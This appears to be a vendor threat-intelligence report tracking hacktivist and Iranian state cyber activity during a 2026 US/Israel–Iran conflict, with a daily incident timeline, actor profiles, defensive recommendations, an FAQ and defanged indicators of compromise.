Iran vs. Israel & US Cyber War 2026: Operation Epic Fury Threat Intelligence

On February 28, 2026, the US and Israel launched Operation Epic Fury, striking Iran’s military command, missile infrastructure, and senior leadership. Khamenei, the Defense Minister, the IRGC commander, and the army chief of staff were all reported killed within hours.

Iran retaliated by hitting 27 US bases across the region, plus Israel, with notable strikes on Bahrain’s 5th Fleet HQ, Kuwait’s airport, and attempted strikes on Riyadh. Gulf states caught in the crossfire saw a Shahed drone hit Dubai’s Fairmont Hotel, Abu Dhabi’s airport struck with casualties, and air defenses engaged over Doha. Airports closed, and financial capitals went into shelter mode.

Inside Iran, a parallel cyberattack drove internet connectivity to 4% of normal. Government sites went dark, state outlet IRNA went offline, and IRGC-linked Tasnim was hacked and reportedly displayed anti-Khamenei messages. The blackout appeared designed not just to isolate Iranians from the outside world, but to sever the leadership from its own command structure.

With its conventional military badly degraded, cyber operations may be Iran’s only remaining tool for retaliation in the coming days.

Timeline of Cyber Attacks in the Iran-Israel Conflict

Below are the highlights of the everyday and threat intelligence sections:

March 25, 2026: Handala Targets Former Mossad Chief, BD Anonymous Hits Interpol, and Keymous Returns to Egypt

March 25, Day 26 opened with Handala’s most personally targeted operation since the conflict began. While DDoS campaigns continued across Egypt and international organizations, the day’s defining moment was a hack-and-leak post naming a former intelligence chief and claiming 14 gigabytes of documents to prove it.

March 24, 2026 | Alliance Fractures, Bounties, and a Kurdish Front Opens

Our Week 3 Threat Assessment Report is now available. Check it for a summary of both weeks’ developments.

On March 24, Cyb3r Drag0nz Kurdish formally broke from the Cyber Islamic Resistance coalition, publishing the names and photographs of six Peshmerga fighters killed in Iranian strikes and calling on the Kurdish diaspora to stand against Iran. The same day, Iran-aligned Fynix announced attacks on Kurdish governments and organizations in direct response, opening a new sub-front between pro-Iranian actors and Kurdish groups. Handala posted a $50 million bounty on Trump and Netanyahu in response to the DOJ’s own $10 million bounty on Handala members. Cyber Fattah issued a formal entry statement signaling a pre-operational reconnaissance phase.

March 23, 2026 | Handala Publishes Power Grid Maps, NoName Reaches Denmark, and DieNet Tests Google

On March 23, Handala published nine schematic maps of Israeli power plant and electrical grid infrastructure on its website. NoName057(16) opened a new front in Denmark and Greenland under #OpDenmark, targeting Air Greenland and Nuuk’s public transport system around the announcement of early Danish elections. Conquerors Electronic Army hit an Israeli business directory, and DieNet claimed to have bypassed Google’s hosting protection on the Lamborghini website, framing it as proof that no hosting infrastructure is immune.

March 22, 2026 | Keymous Reaches Egypt, a New Channel Geolocates Hotels, and the Lockheed Claim Gets a PoC

On March 22, Keymous Plus extended #Op_Epstein_Gulf to Egypt, claiming verified DDoS across six government targets including the Cabinet, Ministry of Interior, and Ministry of Petroleum. A newly surfaced channel called Harvesting Time published satellite imagery geolocating the King David Hotel in Jerusalem and the Erbil Rotana Hotel in Iraqi Kurdistan with no breach claim attached. Cyber Fattah forwarded an alleged Proof of Concept for APT IRAN’s Lockheed Martin breach claim, including dark web contact details and IOC strings. The claim remains unverified.

March 21, 2026 | NoName Sweeps Romania Again, DieNet Claims 100 Attacks in a Day

On March 21, NoName057(16) returned to Romania with two separate waves of verified DDoS, hitting MOL Romania, Romanian Railways Authority, Bucharest Metro, the Chamber of Deputies, both Supreme Courts, and a state rail construction plant under #OpRomania and #TimeOfRetribution. DieNet reported more than 100 attacks against 50+ Israeli websites in a single day under #CanYouResist, with El Al, the IDF portal, Rafael, and Israeli ISPs among confirmed targets. RuskiNet republished a 2025 Bank of Jerusalem data leak, framing the re-release as a visibility operation for those who missed the original.

March 20, 2026 | Eid, Nowruz, and a Quiet Day With a Loud Claim

On March 20, hacktivist activity dropped sharply as Eid al-Fitr and Nowruz coincided for the first time in years, silencing most of the coalition’s daily operational tempo. APT IRAN used the quiet to publish a screenshot of an alleged water treatment HMI panel in Fenton, Missouri, claiming access to a Kupferle Water Solutions control system dated March 10. The same day, APT IRAN circulated an unverified claim of a 375TB Lockheed Martin breach, offering the alleged data for sale via ThreatMarket. No verified evidence was published.

March 19, 2026 | FBI Seizes Handala’s Domain, 313 Team Downs the Internet Archive, and the Coalition Keeps Expanding

On March 19, the FBI seized handala-redwanted.to under a federal warrant, citing use of the domain to support malicious cyber activities on behalf of a foreign state actor. Handala’s nameservers were redirected to FBI infrastructure, the group migrated to a new domain, and its Telegram activity continued uninterrupted. 313 Team took down the Internet Archive with a verified ongoing DDoS, targeting civilian digital infrastructure with no connection to the conflict. BD Anonymous returned to South Korea, claiming the Ministry of National Defence website under #OpSouthKorea. Conquerors Electronic Army hit an Israeli business directory under the CIR umbrella, and a Malaysia-based group announced #OpsShadowStrike targeting Israel-allied countries after Eid.

March 18 | Larijani Killed, Iran Retaliates, and 8.3 Million Israeli Voter Records Leaked

On March 18, Israel confirmed the killing of Ali Larijani, secretary of Iran’s Supreme National Security Council and the highest-ranking official eliminated since Khamenei’s assassination on February 28, alongside Basij commander Gholamreza Soleimani and the IRGC’s Aerospace Force chief. Iran retaliated with missile strikes on Israeli targets. On the cyber front, NoName057(16) swept six Israeli insurance and defense-technology targets under #OpIsrael with verified downtime, INDOHAXSEC published an alleged 8.3 million Israeli voter records sourced from general election data, Cyber Islamic Resistance claimed server access at Israeli firm Logit E.D, and APT IRAN warned Iranian Starlink users that their devices were being tracked by Israeli intelligence while threatening to expose VPN sellers operating inside Iran.

March 17, 2026 | Microsoft, South Korea, and the Israeli Lawyers Database

Our Week 2 Threat Assessment Report is now available. Check it for a summary of both week’s developments.

On March 17, 313 Team, Anti-Zionist Cyber Group, and Keymous Plus all claimed to target Microsoft 365, Outlook, and Copilot with DDoS disruption. Keymous Plus extended #Op_Epstein_Gulf to Telecom Egypt, its first North African target. Hider_Nex attacked 15+ South Korean government domains under #OpSouthKorea, including the Ministry of Defence and National Intelligence Service. NetStrike resurfaced with a claimed 29,300-record Israeli lawyers database under #OpIsrael. Unverified.

March 14–16, 2026: Targeting Intelligence, Telecom Strikes, and the Counter-Offensive Takes Shape

On March 14, Keymous Plus swept eight Syrian government domains under #Op_Epstein_Gulf, Mad Ghost claimed an attack on Israeli 4G core infrastructure with verified IP addresses and protocol details, and Anonymous Syria Hackers dropped a 3.2GB leak from an Iranian Khamenei-linked educational institution under #Op_Iran, exposing staff identity records and national ID numbers.

On March 15, Golden Falcon published satellite imagery of a labeled Israeli military satellite site with precise coordinates, no breach claim attached. Pure targeting intelligence, shared across Telegram to tens of thousands of followers. By March 16, the mass DDoS sweep era was giving way to more deliberate, intelligence-driven operations as the conflict entered its third week. Iran’s internet blackout stood at sixteen consecutive days, with connectivity still below 1% of pre-conflict levels.

March 13 | Cyber Islamic Resistance Breaches Israeli Security Firm, 313 Team Hits UAE, NoName Stays Locked on Cyprus

On March 13, Cyber Islamic Resistance claimed a breach of MEGINIM DATA SERVICES, an Israeli cybersecurity company, publishing three batches of alleged exfiltrated data in a symbolic escalation targeting Israel’s defensive cyber sector. 313 Team turned its focus to the UAE, hitting 20 government domains across Abu Dhabi and Dubai in a single coordinated operation. NoName057(16) returned to Cyprus for the third consecutive day under #OpCyprus, adding municipal portals, media outlets, and utility infrastructure to its target list while calling out geo-based restrictions as failed evasion attempts. INDOHAXSEC claimed a data breach against Israeli e-commerce platform P1000, publishing only 2 customer records, including identity numbers and credentials.

March 12 | Handala’s Wiper Hits Stryker, Keymous Floods Six Arab Countries, Romania Drawn Into Conflict

On March 12, Handala claimed a wiper attack against medical technology giant Stryker, allegedly abusing Microsoft Intune to remotely wipe over 200,000 devices across 79 countries, sending home 5,000+ workers in Ireland. Keymous Plus swept six Arab countries under #Op_Epstein_Gulf with 50+ verified DDoS claims hitting nearly every major government ministry across Syria, Jordan, Qatar, Bahrain, Kuwait, and the UAE. 313 Team shut down Romania’s National Tax Agency for one hour in retaliation for the Romanian president’s statements on US military base access, marking the first confirmed European government target of the conflict.

March 11 | Hider_Nex Sweeps Kuwait, New Alliances, and NetStrike’s One-Day Story

On March 11, Hider_Nex, a newly emerged Tunisian group, declared an alliance with NoName057(16) and immediately launched DDoS claims against 18 Kuwaiti government domains in a single operation, hitting defense, health, finance, and civil infrastructure. Moroccon Black Cyber Army claimed disruption of Israeli Discount Bank under #OpIsrael, with limited but verified impact. NetStrike completed its full lifecycle in one day: channel created, alliance formed with Keymous+, DDoS claimed against an Israeli radio station, then silence.

March 10 | FSociety’s 42-Hour Deadline, NoName Hits Water and Telecom

On March 10, Team Fearless hit Alon Israel Oil Company, defense firm Goldtec Technologies, and Amarel Ltd. under #OpIsrael, mixing energy, defense, and commercial targets in one campaign. NoName057(16) claimed disruption of Bezeq, Mekorot, Kavim, and UAV maker E.M.I.T. Aviation in a single post, then separately extended its #OpCyprus campaign to the national electricity authority, airport transfers, and public transit systems. FSociety issued a 42-hour threat against Israel and the US, calling for mass mobilization, with no technical activity confirmed yet.

March 7-9 | New Supreme Leader, Wider Targets, OT Claims Surge

Our Week 1 Threat Assessment Report is now available. Check it for a summary of last week’s developments.

March 7-9, 368 cyber incidents were tracked across a dozen countries, with Israel absorbing half of them. OT and ICS claims intensified, with groups asserting control over hotels, water systems, banks, and universities. Geographic targeting expanded to Cyprus, the UK, and Saudi Arabia, while the election of a new Supreme Leader under IRGC influence signals more state-directed operations ahead.

March 6 | MuddyWater’s Pre-Planted Backdoors and Kuwait’s Worst Day

On March 6, it was uncovered that MuddyWater had already planted backdoors inside a US bank, airport, and defense-adjacent firms before the conflict began. On the surface, 313 Team launched the most coordinated single-group assault of the conflict, targeting 26 Kuwaiti government domains, including defense, health, and civil infrastructure. DieNet struck nine Qatari government sites, framing it as retaliation for media censorship.

March 5 | The Front Goes Global, Data Leaks on Both Sides

On March 5, Pro-Iranian and Russian-aligned groups ran parallel DDoS, leak, and infrastructure probe campaigns across the US, Israel, and the Gulf, with India and Pakistan now appearing on the target map. Keymous claimed 300,000+ records from Israel’s Ministry of Education internal portal. A new group, Cyber Jihad Movement, announced entry into the conflict with stated ties to Taliban-aligned actors.

March 4 | OT Claims Escalate, Grain Storage and Water Systems Targeted

On March 4, APT Iran claimed a month-long intrusion into Jordan’s grain storage systems, allegedly manipulating temperatures and underreporting wheat weights. Z-Pentest Alliance published screenshots of an Israeli water pump HMI, claiming real-time control over valves and alarms. DieNet expanded into Jordanian civilian infrastructure, claiming access to employee payroll and ID data from the electricity distribution company.

March 3 | Russia Joins the Coalition, Gulf States Under Pressure

On March 3, Pro-Russian hacktivist clusters formally joined the pro-Iran coalition, dividing focus between Europe and the Middle East. Gulf states faced widening DDoS campaigns across government ministries and airports. Large-scale OT claims surfaced, though most lacked technical verification and appeared primarily narrative-driven.

March 2 | Critical Infrastructure Targeted, Ransomware Enters the Picture

On March 2, Multiple actors escalated toward critical infrastructure, with ICS and PLC screenshots shared as alleged proof of access to energy systems. DieNet published structured target lists spanning Qatar, Bahrain, the UAE, Kuwait, and Saudi Arabia. An Israeli company appeared on the INC Ransomware disclosure blog with roughly 1TB of alleged exfiltrated data.

March 1 | Hacktivist Coalitions Form, Gulf Governments First in Line

On March 1, Cyber Islamic Resistance launched a joint Electronic Operations Room, consolidating several hacktivist groups under a single operational banner. Gulf governments, particularly Jordan and Kuwait, became the primary targets with DDoS as the dominant method. Activity began expanding toward Israeli and US entities, with early reconnaissance and doxxing posts signaling what was coming.

U.S. & Israeli Cyber Operations During Operation Epic Fury

The operation was not purely kinetic. From the first strike, cyber operations ran in parallel, designed to blind and isolate the Iranian command before bombs landed.

As fighter jets and cruise missiles struck IRGC command centers, a parallel front paralyzed the Islamic Republic from within. Israeli sources claimed it as “the largest cyberattack in history.” Critical infrastructure, official news sites, and security communications stopped functioning, leaving leadership in the dark at home and abroad. Western intelligence sources confirmed that the damage to the IRGC’s communications infrastructure was deliberate. The goal was to prevent counterattack coordination and disrupt drone and ballistic missile launch capabilities.

This was not improvised. The operation was the peak of a campaign that began in January, when government satellite broadcasts were hacked, and content calling for the regime’s overthrow was aired to millions of Iranian households.On February 28, that groundwork culminated in a combined electronic warfare and DDoS assault that took IRNA offline and hacked Tasnim, the IRGC-affiliated outlet, to display anti-Khamenei messages directly on its own platform.

Space-based intelligence, electronic warfare aircraft, and cyber support elements likely degraded radar coverage, air defense coordination, and facility communications during the opening phase. Consistent with US-Israeli joint doctrine: suppress the enemy’s ability to see, communicate, and respond before the first bomb lands. With connectivity confirmed at 4% of normal levels, Iran went dark precisely when its leadership needed communications most.

Iran’s Cyber Capabilities and Threat Actors

Iran treats cyber operations as a core instrument of national power. Over the past decade, Tehran has institutionalized offensive cyber activity through units linked to the Islamic Revolutionary Guard Corps and the Ministry of Intelligence. Iranian operators blend espionage, disruption, data theft, wiper attacks, and influence campaigns. They favor asymmetric targeting. They focus on critical infrastructure, defense contractors, telecom providers, and political networks across the US, Israel, and the Gulf.

Key Iranian APT Groups

Security researchers track multiple active Iranian threat clusters. These groups vary in technical profile, persistence, and strategic focus, but all align with Tehran’s geopolitical goals:

Pro-Iran Hacktivist and Proxy Actors – Retrospective

During the June 2025 escalation, hacktivist activity surged in parallel with state cyber operations. SOCRadar recorded more than 600 distinct cyberattack claims across over 100 Telegram channels within 15 days.

Daily claims peaked shortly after major kinetic strikes, showing a clear link between battlefield events and online activity. Most operations consisted of DDoS attacks, followed by data leaks, defacements, doxxing, broadcast hijacks, and limited operational technology disruption.

Israel accounted for the majority of claims, while the United States and several Gulf states also faced repeated targeting. Telegram served as the primary coordination and amplification platform. Channels published screenshots, breach claims, and alleged proof of disruption. Many claims were exaggerated or duplicated, but the sustained volume created psychological pressure and media amplification.

Hacktivist Activity Snapshot in June 2025, Twelve-Day War

The last conflict demonstrated that hacktivism did not operate in isolation. It amplified state objectives, expanded the attack surface, and complicated attribution. In a renewed escalation, similar waves of DDoS activity, leak campaigns, and coordinated influence operations should be expected, and the attacks already in progress.

Hacktivist Activity in the Iran–Israel Cyber War

The ecosystem included ideologically aligned regional collectives, opportunistic actors seeking visibility, and propaganda driven groups linked to broader strategic narratives. Attribution often remained ambiguous by design. Branding shifted. Group names changed. Channels reappeared under new identities. The operational behavior, however, follows a consistent pattern. Below are the key details:

Pro-Iran Hacktivist Groups — 70+ Groups

Pro-Israel / Allied — 11 Groups

Industries at Risk from Iranian Cyber Attacks

Recommendations

State Entities, Government Agencies & Critical Infrastructure Operators

Governments and infrastructure operators in Israel, the US, Gulf states, and any country perceived as aligned with Operation Epic Fury are priority targets for both Iranian APTs and hacktivist collectives. Action is required now, not after an incident.

Access & Identity

• Enforce MFA on all government and infrastructure accounts without exception
• Audit and immediately revoke unnecessary remote access privileges
• Remove any unmanaged RMM tools from government networks; MuddyWater actively abuses legitimate remote management software for persistence
• Rotate credentials for all privileged accounts and cloud administrator roles

Network & Perimeter

• Patch all internet-facing devices, VPN appliances, and edge infrastructure immediately; Fox Kitten specializes in unpatched perimeter exploitation
• Review DNS query logs for anomalous patterns; OilRig uses DNS hijacking as a primary exfiltration technique
• Activate or validate DDoS mitigation capacity on all public-facing portals; government domains in Jordan, Kuwait, and Israel are already being targeted
• Segment and isolate all ICS and OT environments; CyberAv3ngers require minimal technical capability to disrupt industrial control systems

Detection & Response

• Deploy detection rules covering PowerShell-based loaders, RMM abuse, and spearphishing TTPs consistent with MuddyWater and OilRig
• Establish a clear internal protocol for responding to Telegram breach claims before they generate press coverage; Iran’s information operations are designed to force a public response on the attacker’s timeline
• Review and test incident response plans now; do not wait for an active incident to discover gaps
• Brief senior leadership on the information operations dimension; fabricated breach claims and leaked documents are part of the playbook

For Energy, Finance & Maritime Operators Specifically

• Prioritize patching of DNS and network infrastructure against OilRig TTPs
• Review DDoS mitigation capacity; Iran conducted sustained attacks against more than 50 US banks in a previous escalation cycle
• Treat port systems, logistics platforms, and navigation communications as active targets

Other Organizations: NGOs, Diplomatic Missions, Media & Civil Society

Geography is now a risk factor. Any organization, regardless of sector or mission, with offices, staff, or digital infrastructure based in Israel, the United States, Gulf states, Jordan, or any country perceived as aligned with Operation Epic Fury should treat itself as potentially in scope. NGOs, diplomatic missions, media outlets, law firms, universities, healthcare providers, and private sector companies alike are all viable targets, either as primary objectives or as stepping stones to higher-value networks.

Beyond geography, Iranian APTs deliberately target civil society, journalists, diplomats, and activists as intelligence sources and to identify individuals deemed threats to the regime. If your organization works on, reports on, or engages with Iran-related policy, human rights, or regional affairs, the targeting risk is elevated regardless of where you are based.

For All Staff

• Issue immediate awareness briefings; credential harvesting via social engineering is the primary threat vector, not malware
• Treat any inbound outreach from journalists, conference organizers, or researchers as potentially adversarial until independently verified
• Never enter credentials via links received by email, WhatsApp, or Telegram regardless of how legitimate the sender appears
• Assume that any staff member who has engaged with Iran-related policy networks, attended regional conferences, or communicated with Iranian contacts may already be targeted

Cloud & Communications Security

• Conduct immediate credential audits across all staff accounts on Microsoft 365, Google Workspace, and cloud collaboration platforms
• Revoke and reissue all active session tokens
• Review who has access to shared drives and document repositories; APT42 operates almost entirely within cloud environments post-compromise
• Enable login anomaly alerting across all cloud platforms

For Diplomatic Missions & Embassies Specifically

• Apply the above with maximum urgency; APT42 specifically impersonates credible diplomatic and policy personas to target foreign ministry staff
• Treat all unsolicited conference invitations, document review requests, and interview requests as potential spearphishing attempts
• Coordinate with national cyber authorities and threat intelligence firms for threat briefings and IoC sharing

Frequently Asked Questions

Which countries are most at risk of Iranian cyberattacks right now?

Organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting, with regional partners including Jordan, the UAE, Egypt, and Saudi Arabia also in scope. Gulf states hosting US military bases, Bahrain, Kuwait, and Qatar, face an elevated risk given they are already physical targets. Any country perceived as complicit in or supportive of Operation Epic Fury should treat itself as a potential cyber target.

Are NGOs and civil society organizations at risk?

Yes, and they are a priority target for Iranian APTs even outside of active conflict. APT42 specifically targets Western and Middle Eastern NGOs, media organizations, academic institutions, and activists. As recently as January 2026, the Iran-linked RedKitten campaign targeted human rights NGOs and activists using macro-laced documents disguised as records of protesters killed during the January crackdown, with malware using GitHub, Google Drive, and Telegram for command-and-control.

Which industries are most likely to be targeted?

Government, critical infrastructure, defense, financial services, academic, and media sectors face the highest direct targeting risk. Beyond these, energy, healthcare, and shipping are historically prioritized, with Iran demonstrating willingness to hit ICS and OT systems in water treatment, oil and gas, and port infrastructure.

What types of attacks should organizations expect?

Organizations should prepare for a mix of DDoS campaigns, ransomware, hack-and-leak operations, website defacements, and attacks targeting exposed edge devices with default passwords. Higher-value targets face spearphishing, credential harvesting via cloud environments, and potential destructive wiper deployments. Iran will also amplify the psychological impact of whatever it achieves: Tehran has a documented pattern of overstating the scope of successful intrusions, turning a single compromised machine into a claimed facility-wide breach as part of its information operations strategy.

Is the threat limited to the Middle East?

No, in past conflicts, Iran has conducted DDoS attacks against more than 50 US banks, ransomware campaigns against critical infrastructure, and disinformation operations aimed at creating political and social chaos within the United States.With CISA operating at reduced staffing due to a DHS funding lapse, the defensive posture of US civilian infrastructure is weaker than it should be at precisely the wrong moment.

Are there any pro-Israel or pro-US groups active?

Yes, but the imbalance is structural rather than a capability gap. Past escalations saw dozens of pro-Iranian groups versus only a handful of pro-Israeli ones — the current cycle is no different.

Allied-side actors include Predatory Sparrow (Israeli intelligence-linked, previously struck Iranian steel and fuel infrastructure), Indian Cyber Force (explicitly pro-Israel, active since 2022), and Syrian opposition-aligned groups like Anonymous Syria Hackers — whose recent breach claim against an Iranian tech firm signals a broader reorientation of former Iranian proxies following Damascus’s change of government.

The reason the allied side looks quieter is simple: Israel operates at the state level, making independent hacktivists largely redundant. Allied-side actors also don’t generate CISA advisories or vendor reports aimed at Western defenders — so they’re under-documented, not inactive. The Telegram asymmetry reflects who needs Telegram, not who is actually operating.

Why are fewer hacktivist groups active compared to the previous 12-day war period?

The lower activity appears linked to Iran’s recent internet restrictions, which disrupted Telegram based coordination and slowed proxy mobilization. At the same time, some Russian-aligned groups have divided their focus between Europe and the Middle East instead of concentrating on one theater. Most visible operations now come from pro-Iranian actors outside Iran, particularly in Southeast Asia, Pakistan, and the broader Middle East. This suggests a temporary coordination slowdown rather than a structural decline in long term state-level cyber capability.

How does Iran use cyber warfare as a strategic tool?

Iran runs its cyber operations primarily through groups linked to the IRGC and the Ministry of Intelligence, making these attacks state-directed rather than opportunistic. These groups focus on long-term espionage, harvesting credentials, and embedding backdoors inside target networks well before any conflict begins. When tensions escalate, the same access gets used for disruption, including wiper malware designed to destroy data and cripple systems. This combination of persistent espionage and ready-to-activate disruption capability is what makes Iranian cyber operations a serious threat, not just during conflict, but at all times.

What cyber attacks has Iran launched against Israel?

Since Operation Epic Fury began, the cyber response against Israel has been led largely by pro-Iranian hacktivist groups rather than confirmed direct Iranian state operations, though given that IRGC-linked networks span across the Middle East, many of these groups are considered state-adjacent at minimum.

Groups like Handala, 313 Team, and Keymous have run DDoS campaigns, data leak operations, and defacements targeting Israeli government, defense, and commercial infrastructure from day one. On the more confirmed state side, MuddyWater stands out: the IRGC-linked group had already pre-planted backdoors inside Israeli-adjacent defense and financial targets before the conflict even started, meaning the access was ready to use the moment tensions escalated.

Conclusion

The conflict that began on February 28, 2026, has no clear endpoint, and the cyber campaign will outlast the kinetic one. Iranian APT groups do not stand down when missiles stop flying. They retool and return. Hacktivist collectives are already mobilizing. Credential harvesting campaigns are running in parallel with every news cycle.

The organizations compromised in the weeks ahead will largely be those that waited to act. The threat is structured, state-directed, and already in motion.

Stay Ahead with SOCRadar

SOCRadar Dark Web Monitoring is actively monitoring all threat actor activity surrounding this conflict in real time across Dark Web forums, Telegram channels, and APT infrastructure. During this period of heightened risk, SOCRadar is offering free access to its threat intelligence platform for organizations in targeted countries and sectors.

With SOCRadar you can:

• Track IoCs tied to APTs like MuddyWater, APT42, OilRig, and active hacktivist collectives
• Monitor your attack surface and identify exposed assets before threat actors do
• Receive real-time Dark Web alerts for credential leaks and breach claims tied to your organization

Get Free Access →

Appendix

A. Iranian APT TTP Matrix

B. Recent Incidents

Handala Stryker Wiper Attack (March 11, 2026) — MOIS-linked Handala orchestrated a destructive attack against US medtech giant Stryker, abusing Microsoft Intune administrative access to remotely wipe approximately 80,000 devices across multiple countries after compromising privileged Entra ID accounts. Stryker confirmed the incident via SEC 8-K, acknowledging global disruption to its Microsoft environment affecting order processing, manufacturing, and shipping. The actor claimed 200,000+ devices wiped and 50TB exfiltrated; neither figure has been independently verified.

Check Point published campaign-level IOCs, including C2 infrastructure at 82.25.35[.]25, 31.57.35[.]223, 107.189.19[.]52, and 146.185.219[.]235. SYK stock fell more than 7.6% over three consecutive trading sessions. Investigation ongoing as of March 17, 2026.

RedKitten (January 2026) — APT42-linked campaign targeting human rights NGOs with macro-laced Office documents disguised as protest casualty records. C2 via GitHub, Google Drive, and Telegram bots.

DCHSpy / MuddyWater (July 2025) — New Android and desktop implant deployed during the June 2025 conflict, confirming active development concurrent with kinetic operations.

CyberAv3ngers / IOControl (2024–ongoing) — IRGC-affiliated malware targeting OT and IoT infrastructure across US and Israeli water utilities and fuel management systems. CISA advisory issued; US Rewards for Justice offer of up to $10M for attribution information remains active.

Anon-g Fox Wiper (June 2025) — Wiper configured to execute only on systems running Israel Standard Time and Hebrew as the default language, confirming geographically targeted destructive deployment.

C. Behavioral Indicators